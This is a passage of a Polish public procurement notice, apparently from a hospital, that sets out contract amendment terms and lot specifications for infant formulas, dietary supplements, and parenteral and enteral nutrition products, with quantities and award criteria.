              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1. Dopuszczalne zmiany postanowień zawartej umowy oraz określenie warunków tych zmian:

 1)	Strony przewidują możliwość zmian postanowień umowy w stosunku do treści oferty w przypadku, gdy:
 a)	nastąpi obniżenie ceny;
 b)	nastąpi zwiększenie rabatu;
 c)	nastąpi zmiana wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę - Zamawiający dopuszcza możliwość wzrostu cen jednostkowych netto w przypadku zmiany wysokości minimalnego wynagrodzenia za pracę. Zmiana cen netto związana ze zmianą wysokości minimalnego wynagrodzenia za pracę może nastąpić nie wcześniej niż z dniem wejścia w życie aktu prawnego wprowadzającego zmianę wysokości wynagrodzenia minimalnego za pracę, z zastrzeżeniem, iż Wykonawca musi udowodnić Zamawiającemu, że ww. zmiana będzie miała wpływ na koszty wykonania zamówienia przez Wykonawcę;
 d)	nastąpi zmiana zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne -  Zamawiający dopuszcza możliwość wzrostu cen jednostkowych netto w przypadku zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne. Zmiana cen netto związana ze zmianą zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne może nastąpić nie wcześniej niż z dniem wejścia w życie aktu prawnego wprowadzającego zmianę zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne, z zastrzeżeniem, iż Wykonawca musi udowodnić Zamawiającemu, że ww. zmiana będzie miała wpływ na koszty wykonania zamówienia przez Wykonawcę;
 e)	nastąpi zmiana stawki podatku VAT - Zamawiający dopuszcza możliwość wzrostu cen jednostkowych brutto w przypadku zmiany stawki podatku od towarów i usług VAT. Zmiana cen brutto związana ze zmianą stawki podatku VAT może nastąpić najwcześniej z dniem wejścia w życie aktu prawnego wprowadzającego zmianę stawki podatku VAT, z uwzględnieniem obowiązujących regulacji;
 f)	nastąpią zmiany osób wskazanych przez strony do realizacji umowy;
 g)	nastąpi zmiana numeru katalogowego nie powodująca zmiany przedmiotu umowy;
 h)	umowa nie zostanie zrealizowana do wartości brutto w terminie jej obowiązywania  czas trwania umowy może zostać wydłużony aż do wyczerpania wartości brutto, jednak nie dłużej niż o 6 miesięcy;

 2)	Zamawiający dopuszcza także w szczególnych sytuacjach i za jego pisemną zgodą w trakcie trwania umowy zmianę przedmiotu umowy dostarczanego przez Wykonawcę, w szczególności w sytuacji gdy zaprzestano lub zawieszono produkcję danego towaru objętego umową, na inny towar o parametrach nie gorszych niż opisane w SIWZ, przy czym cena tego towaru zamiennego nie może przekraczać ceny towaru, na który została podpisana umowa.  W przypadku zaprzestania lub zawieszenia produkcji towaru objętego umową Wykonawca winien udokumentować ten fakt. 

 3)	Ponadto istnieje możliwość zmiany umowy jeżeli:
a)	łączny ewentualny wzrost wartości zamówienia jest mniejszy niż kwoty określone w przepisach wydanych na podstawie art. 11 ust. 8 uPzp i jest mniejszy od 10% wartości zamówienia określonej pierwotnie w umowie;
b)	zmiany dotyczą realizacji dodatkowych dostaw, od dotychczasowego wykonawcy, nieobjętych zamówieniem podstawowym, o ile stały się niezbędne i zostały spełnione łącznie następujące warunki:
	zmiana wykonawcy nie może zostać dokonana z powodów ekonomicznych lub technicznych, w szczególności dotyczących zamienności lub interoperacyjności sprzętu, usług lub instalacji, zamówionych w ramach zamówienia podstawowego,
	zmiana wykonawcy spowodowałaby istotną niedogodność lub znaczne zwiększenie kosztów dla zamawiającego,
	wartość każdej kolejnej zmiany nie przekracza 50% wartości zamówienia określonej pierwotnie w umowie;
c)	wykonawcę, któremu zamawiający udzielił zamówienia, ma zastąpić nowy wykonawca:
	w wyniku połączenia, podziału, przekształcenia, upadłości, restrukturyzacji lub nabycia dotychczasowego wykonawcy lub jego przedsiębiorstwa, o ile nowy wykonawca spełnia warunki udziału w postępowaniu, nie zachodzą wobec niego podstawy wykluczenia oraz nie pociąga to za sobą innych istotnych zmian umowy;
	w wyniku przejęcia przez zamawiającego zobowiązań wykonawcy względem jego podwykonawców;
d)	zostały spełnione łącznie następujące warunki: 
	konieczność zmiany umowy spowodowana jest okolicznościami, których zamawiający, działając z należytą starannością, nie mógł przewidzieć, 
	wartość zmiany nie przekracza 50% wartości zamówienia określonej pierwotnie w umowie;

 4)	Poza okolicznościami wskazanymi powyżej zakazuje się między innymi następujących zmian niniejszej umowy skutkujących:
 a)	zmianą ogólnego charakteru umowy, w stosunku do charakteru umowy w pierwotnym brzmieniu;
 b)	wprowadzeniem warunków, które, gdyby były postawione w postępowaniu o udzielenie zamówienia, to w tym postępowaniu wzięliby lub mogliby wziąć udział inni wykonawcy lub przyjęto by oferty innej treści;
 c)	naruszeniem równowagi ekonomicznej umowy na korzyść wykonawcy w sposób nieprzewidziany pierwotnie w umowie;
 d)	znacznym rozszerzeniem lub zmniejszeniem zakresu świadczeń i zobowiązań wynikający z umowy;
 e)	zastąpieniem wykonawcy, któremu zamawiający udzielił zamówienia, nowym wykonawcą.

 5)	Wykonawca powinien wykazać Zamawiającemu okoliczności uzasadniające dokonanie zmiany umowy. Zamawiający ma w tym zakresie prawo żądania przedłożenia przez Wykonawcę odpowiednich wyjaśnień, oświadczeń lub innych dokumentów które pozwolą Zamawiającemu ocenić zasadność zmiany umowy.  
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 21/09/2016, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b><br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.Mleko poczatkowe w płynie, gotowe do spożycia, wzbogacone w LIPIL(mieszanka kwasów DHA 0,3% i ARA 0,6%) przenaczone dla niemowlat od urodzenia	płyn	1 but. 59 ml	2820
2.preparat dietetyczny  - dieta eliminacyjna w nietolerancji pokarmowej,  (hydrolizat enzymatyczny kazeiny i Lactobacillus GG) do 6 miesiąca życia	proszek	puszka 400g	50
3.preparat dietetyczny  - dieta eliminacyjna w nietolerancji pokarmowej,  (hydrolizat enzymatyczny kazeiny i Lactobacillus GG) od 6 miesiąca życia	proszek	puszka 400 g	15
4	Smoczki jednorazowe jałowe do mleka opisanego  w pozycji nr 1	 	 Szt. 	2820
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>33692000-7, 33692210-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena </td><td>60</td></tr><tr><td>Termin płatności</td><td>20</td></tr><tr><td>Termin dostawy </td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Uwagi:
1. wszystkie produkty muszą być oznaczone znakiem CE
<br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b><br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1	Preparat do postępowania dietetycznego przeznaczony dla niemowląt od urodzenia, z tendencją do ulewania, które nie są karmione piersią. Zawiera białko serwatkowe częściowo zhydrolizowane OPTI PRO HA, zawiera dodatek żywych kultur bakterii L.reuterii, zawiera skrobię ziemniaczaną, wzbogacone w 13 witamin, zawiera Zn i Se wspomagające system immunologiczny, bezglutenowe	proszek	puszka 500g	6
2	mleko modyfikowane początkowe dla zdrowych niemowląt z podwyższonym ryzykiem wystąpienia alergii o zawartości białka OPTI PRO HA 1,28g/100ml oraz laktozy 7,85g/100ml	płyn	1 butelka 90 ml	1500
3	Modyfikowane mleko dla niemowląt z niską i bardzo niską urodzeniową masą ciała, wysokoenergetyczne (80 kcal/100 ml),  zawiera zhydrolizowane białko serwatkowe (2,3g/100 ml), obniżoną zawartość laktozy, długołańcuchowe wielonienasycone kwasy tłuszczowe (AA, DHA)oraz łatwo przyswajalne tłuszcze 
MCT, nukleotydy oraz wysoką zawartość wapnia i fosforu (stosunek 1,8:1) 	płyn	1 butelka 70 ml	1500
4	Smoczki jednorazowe jałowe do mlek opisanych w pozycji 2 i 3 	 	 Szt.	3000
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>33692000-7, 33692210-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena </td><td>60</td></tr><tr><td>Termin płatności</td><td>20</td></tr><tr><td>Termin dostawy </td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Uwagi:
1. wszystkie produkty muszą być oznaczone znakiem CE
<br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b><br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1	Mleko w płynie przeznaczone dla noworodków urodzonych o czasie; gł.cechy: energia 66kcal/100ml; białko 1,4g/100 ml w proporcji kazeina do białek serwatkowych 40:60; tłuszcze 3,2g/100 ml wtym nienasycone kw.tłuszczowe ARA i DHA w ilości po 6,4mg/100 ml w proporcji 1:1; węglowodany 7,6g/100 ml w tym laktoza 7,4g/100 ml; zawiera błonnik (GOS); uzupełniony o nukleotydy; wapń 61mg/100ml; żelazo 0,6mg/100ml; witamina A 65mcg/100ml; witamina D 1,0mcg/100ml	płyn	1 butelka 90 ml	1500<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>33692000-7, 33692210-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena </td><td>60</td></tr><tr><td>Termin płatności</td><td>20</td></tr><tr><td>Termin dostawy</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Uwagi:
1. wszystkie produkty muszą być oznaczone znakiem CE
<br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b><br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1	proszek 1 saszetka zawiera: 0,6 g białka, 1,4 g węglowodanów (w tym 1,2 g polisacharydów; nie zawiera laktozy), nie zawiera tłuszczu ani błonnika. Witaminy. Składniki mineralne. Wartość energetyczna 8 kcal/sasz. (33 kJ/sasz.). 50 saszetek po 2,2 g 	proszek	op.50 sasz	3									
2	preparat mlekozastępczy hipoalergiczny, stosowany  w nietolerancji laktozy u dzieci do 6 miesiąca życia	proszek	450g	70									
3	preparat mlekozastępczy hipoalergiczny, stosowany  w nietolerancji laktozy u dzieci powyżej 6 miesiąca życia	proszek	450g	35									
4	Mleko modyfikowane w płynie  gotowe do podania dla noworodków i niemowląt od urodzenia, zawierające łącznie:
 galakto i fruktooligosacharydy  GOS/FOS w stosunku 9:1 (w dawce 0,6 g/100 ml)
 zawierające LCPUFA
 zawierające nukleotydy
 o minimalnym poziomie białka 1,3 g/100ml
 o maksymalnym poziom żelaza 0,6mg/100ml.
 Maksymalna osmolarność mieszanki 285 mOsm/l	płyn	1 butelka 90 ml	2000									
5	Smoczki jednorazowe jałowe do mleka opisanego w pozycji nr 4 		Szt. 	2000									
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>33692000-7, 33692210-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena </td><td>60</td></tr><tr><td>Termin płatności</td><td>20</td></tr><tr><td>Termin dostawy </td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Uwagi:
1. wszystkie produkty muszą być oznaczone znakiem CE
<br /></div></div><br /></div><div><b>Część nr: </b>5
                  
                <b>Nazwa: </b><br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1	DIET ŚR SPOŻ. - PIROFOSFORAN ŻELAZA (ŻELAZO III), CHLOROWODOREK PIRYDOKSYNY (WITAMINA B6), KWAS ASKORBINOWY (WITAMINA C), KWAS FOLIOWY (WITAMINA B9), MALTODEKSTRYNA, DEKSTROZA.	7 mg	30 sasz	10	 	 	 	 	 	 	 	 	 
2	DIET ŚR SPOŻ.WITAM. K DLA NOWORODKÓW 	kaps."twist off" 2 mg	20 kaps."twist off"	40	 	 	 	 	 	 	 	 	 
3	Dietetyczny środek spożywczy specjalnego przeznaczenia medycznego; Dla niemowlaków karmionych piersią od 15 doby życia do ukończenia 3 miesiąca życia.; Skład: 1 kapsułka zawiera: 150 g witaminy K . Składniki (zawartość kapsułki): oleje roślinne (kokosowy i palmowy); fitomenadion (witamina K1). Składniki otoczki: żelatyna, substancja utrzymująca wilgoć: glicerol, barwnik: tlenek żelaza. 	kaps."twist off" 150 mcg	30 kaps."twist off"	7									
4	PREPARAT ZŁOŻONY - szczep probiotyczny lactobacillus rhamnosus lcr35, skrobia ziemniaczana, fruktooligosacharydy, laktoza, maltodekstryna, kwas askorbinowy, żelatyna, hydroksypropylometyloceluloza, karmel.	kapsułki	30 kaps.	15									
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>33692000-7, 33692210-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin płatności</td><td>20</td></tr><tr><td>Termin dostawy </td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Uwagi:
1. wszystkie produkty muszą być oznaczone znakiem CE.
2. wszystkie preparaty dodawane do oferowanych płynów stosowanych w żywieniu pozajelitowym muszą być zgodne pod względem recepturowym.

<br /></div></div><br /></div><div><b>Część nr: </b>6
                  
                <b>Nazwa: </b><br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1	Roztwory pierwiastków śladowych  dodawane do płynów stosowanych w żywieniu pozajelitowym	inj. 10 ml	1 amp. 10 ml	480	 
2	Roztwory aminokwasów z dodatkiem glukozy oraz elektrolitów w systemie worków dwukomorowych do pełnego żywienia pozajelitowego o zawartości azotu  6,8-9 g/ 1 litr 	płyn	1 worek 1500 ml	15	 
3	Roztwory aminokwasów z dodatkiem glukozy oraz elektrolitów w systemie worków dwukomorowych do pełnego żywienia pozajelitowego o zawartości azotu  8 g/ 1 litr 	płyn	1000ml	10	
4	Roztwór aminokwasów o stężeniu 8 %, do żywienia pozajelitowego, dla chorych z niewydolnością wątroby	płyn	500ml	300	
5	Roztwory aminokwasów 10% stosowane wżywieniu pozajelitowym noworodków i niemowląt o pojemności 100 ml.	inj. 10%	100ml	80	
6	Preparaty dipeptydowe  zawierający glutaminę o pojemności 100 ml.	płyn	1 but. 100 ml	300	
7	Roztwory zawierające glicerolofosforany sodu dodawane do płynów stosowanych w żywieniu pozajelitowym.	płyn	fiol 20 ml	1950	
8	Roztwory aminokwasów z dodatkiem glukozy, elektrolitów oraz emulsji tłuszczowych LCT w systemie worków trzykomorowych do pełnego  centralnego żywienia pozajelitowego o zawartość azotu 5-6g /1litr, 140-150 kcal  niebiałkowych na 1 g azotu,                        	płyn	1540ml/1400kc	80	
9	Roztwory aminokwasów z dodatkiem glukozy, elektrolitów oraz emulsji tłuszczowych LCT  w systemie worków trzykomorowych do pełnego  żywienia pozajelitowego o zawartość azotu 3-4g/1litr, 145-170 kcal  niebiałkowych na 1 g azotu i osmolarności  ok. 800 mosm/l                    	płyn	1440ml/1000kc	400	
10	Roztwory aminokwasów 10% stosowane w żywieniu pozajelitowym u chorych z ostra  lub przewlekłą niewydolnością nerek ( Nephro ) 	płyn	500ml	40	
11	Emulsje tłuszczowe zawierają długołańcuchowe nienasycone kwasy  omega-3  	płyn	1 worek 100 ml	155	
12	Roztwory aminokwasów z dodatkiem glukozy, bez elektrolitów oraz emulsji tłuszczowych LCT/MCT/ omega-3 oliwa z oliwek w systemie worków trzykomorowych do pełnego centralnego żywienia pozajelitowego o zawartość azotu 4g, 100-120 kcal  niebiałkowych na 1 g azotu   	płyn	493 ml	250	
13	Roztwory aminokwasów z dodatkiem glukozy, elektrolitów oraz emulsji tłuszczowych LCT/MCT/ omega-3 oliwa z oliwek w systemie worków trzykomorowych do pełnego centralnego żywienia pozajelitowego o zawartość azotu 7,5-8,5g/1litr, 100-120 kcal  niebiałkowych na 1 g azotu   	płyn	1 worek poj. 1477 ml	40	
14	Roztwory aminokwasów z dodatkiem glukozy, bez elektrolitów oraz emulsji tłuszczowych LCT/MCT/ omega-3 oliwa z oliwek w systemie worków trzykomorowych do pełnego centralnego żywienia pozajelitowego o zawartość azotu 7,5-8,5g/1litr, 100-120 kcal  niebiałkowych na 1 g azotu   	płyn	1477 ml	60	
15	Roztwory mieszaniny witamin rozpuszczalnych w wodzie dodawane do płynów stosowanych w żywieniu pozajelitowym.	inj. 1 ml	1 amp.	1000	
16	Roztwory mieszaniny witamin rozpuszczalnych w tłuszczach dodawane do płynów stosowanych w żywieniu pozajelitowym.	inj. 10 ml	1 amp.	400	
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>33692000-7, 33692210-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena </td><td>60</td></tr><tr><td>Termin płatności</td><td>20</td></tr><tr><td>Termin dostawy</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Uwagi:
1. wszystkie produkty muszą być oznaczone znakiem CE.
2. wszystkie preparaty dodawane do oferowanych płynów stosowanych w żywieniu pozajelitowym muszą być zgodne pod względem recepturowym.

<br /></div></div><br /></div><div><b>Część nr: </b>7
                  
                <b>Nazwa: </b><br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1	Roztwory aminokwasów z dodatkiem glukozy, elektrolitów oraz emulsji tłuszczowych LCT/MCT w systemie worków trzykomorowych do pełnego żywienia pozajelitowego drogą naczyń obwodowych, o zawartości azotu 4  5 g/1 litr, 130-150 kcal niebiałkowych na 1 g azotu 	worek	1250 ml	15	 	 	 	 	 	 	 	 	 
2	Roztwory aminokwasów z dodatkiem glukozy, elektrolitów oraz emulsji tłuszczowych MCT 50% z dodatkiem oleju rybiego ze zwiększoną zawartością kwasów omega -3, w systemie worków trzykomorowych, do pełnego żywienia pozajelitowego, o zawartości azotu 6,8g, 	worek	1250 ml	5	 	 	 	 	 	 	 	 	 
3	Roztwory aminokwasów z dodatkiem glukozy, elektrolitów oraz emulsji tłuszczowych MCT 50% z dodatkiem oleju rybiego ze zwiększoną zawartością kwasów omega -3, w systemie worków trzykomorowych, do pełnego żywienia pozajelitowego, o zawartości azotu 5 g, 	worek	625 ml	100									
4	Roztwory pierwiastków śladowych  dodawane do płynów stosowanych w żywieniu pozajelitowym	inj. 10 ml	Amp.	200									
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>33692000-7, 33692210-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin płatości</td><td>20</td></tr><tr><td>Temin dostawy </td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Uwagi:
1. wszystkie produkty muszą być oznaczone znakiem CE.
2. wszystkie preparaty dodawane do oferowanych płynów stosowanych w żywieniu pozajelitowym muszą być zgodne pod względem recepturowym.

<br /></div></div><br /></div><div><b>Część nr: </b>8
                  
                <b>Nazwa: </b><br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1	Roztwory mieszaniny witamin rozpuszczalnych w wodzie i tłuszczach dodawane do płynów stosowanych w żywieniu pozajelitowym	inj. 0,75g	10 amp.	95	 	 	 	 	 	 	 	 	 
2	Emulsje tłuszczowe 20 % zawierająca 80% oleju z oliwek 	płyn	100ml	375	 	 	 	 	 	 	 	 	 
3	Roztwory aminokwasów z dodatkiem glukozy, elektrolitów oraz emulsji tłuszczowych zawierającej 80 % oliwy z oliwek, w systemie worków trzykomorowych, do pełnego, centralnego żywienia pozajelitowego, o zawartości azotu 13,5 g, 1260 kcal niebiałkowej, o zawartości 93 kcal niebiałkowych na 1 g azotu, bez elektrolitów,  	płyn	1500 ml	52									
4	Roztwory aminokwasów z dodatkiem glukozy, elektrolitów oraz emulsji tłuszczowych zawierającej 80 % oliwy z oliwek, w systemie worków trzykomorowych, do pełnego, centralnego żywienia pozajelitowego, o zawartości azotu 13,5 g, 1260 kcal niebiałkowej, o zawartości 93 kcal niebiałkowych na 1 g azotu,  	płyn	1500 ml	80									
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>33692000-7, 33692210-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena </td><td>60</td></tr><tr><td>Termin płatności </td><td>20</td></tr><tr><td>Termin dostawy </td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Uwagi:
1. wszystkie produkty muszą być oznaczone znakiem CE.
2. wszystkie preparaty dodawane do oferowanych płynów stosowanych w żywieniu pozajelitowym muszą być zgodne pod względem recepturowym.

<br /></div></div><br /></div><div><b>Część nr: </b>9
                  
                <b>Nazwa: </b><br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1	Dieta cząstkowa w proszku, wysokobiałkowa, o neutralnym smaku	proszek	puszka 225g	55
2	Dieta kompletna pod względem odżywczym o smaku waniliowym, normalizująca glikemię o niskim indeksie glikemicznym, hiperkaloryczna (1,5 kcal/ml), bogatobiałkowa (powyżej 20% energii z białka), oparta na mieszaninie białek sojowego i kazieiny w proporcjach 40:60, zawartość białka 7,7g/100 ml, zawierająca 6 rodzajów błonnika rozpuszczalnego i nierozpuszczalnego w proporcjach 80:20, zawartość błonnika 1,5g/100 ml, obniżony współczynnik oddechowy (powyżej 46% energii z tłuszczu), dieta z zawartością oleju rybiego, klinicznie wolna od laktozy, bez zawartości fruktozy o osmolarności 395 mOsmol/l, w opakowaniu miękkim typu pack, dieta do podaży przez zgłębnik.	płyn	1000 ml	300
3	Dieta kompletna w płynie, bogatobiałkowa, polimeryczna, oparta na białku źródło: serwatka, kazeina, soja i groch ( 6,3g/100ml 20% energii), z zawartością DHA+EPA 0,34g, hiperkaloryczna (1,25 kcal/ml), oparta o tłuszcze MCT, bezresztkowa, zawiera 6 rodzajów karotenoidów, do podaży przez zgłębnik lub przez stomię, nie zawierająca cholesterolu, o osmolarności nie większej niż 290 mOsm/l, dla pacjentów ze zwiększonym zapotrzebowaniem na białko	płyn	1000ml	174
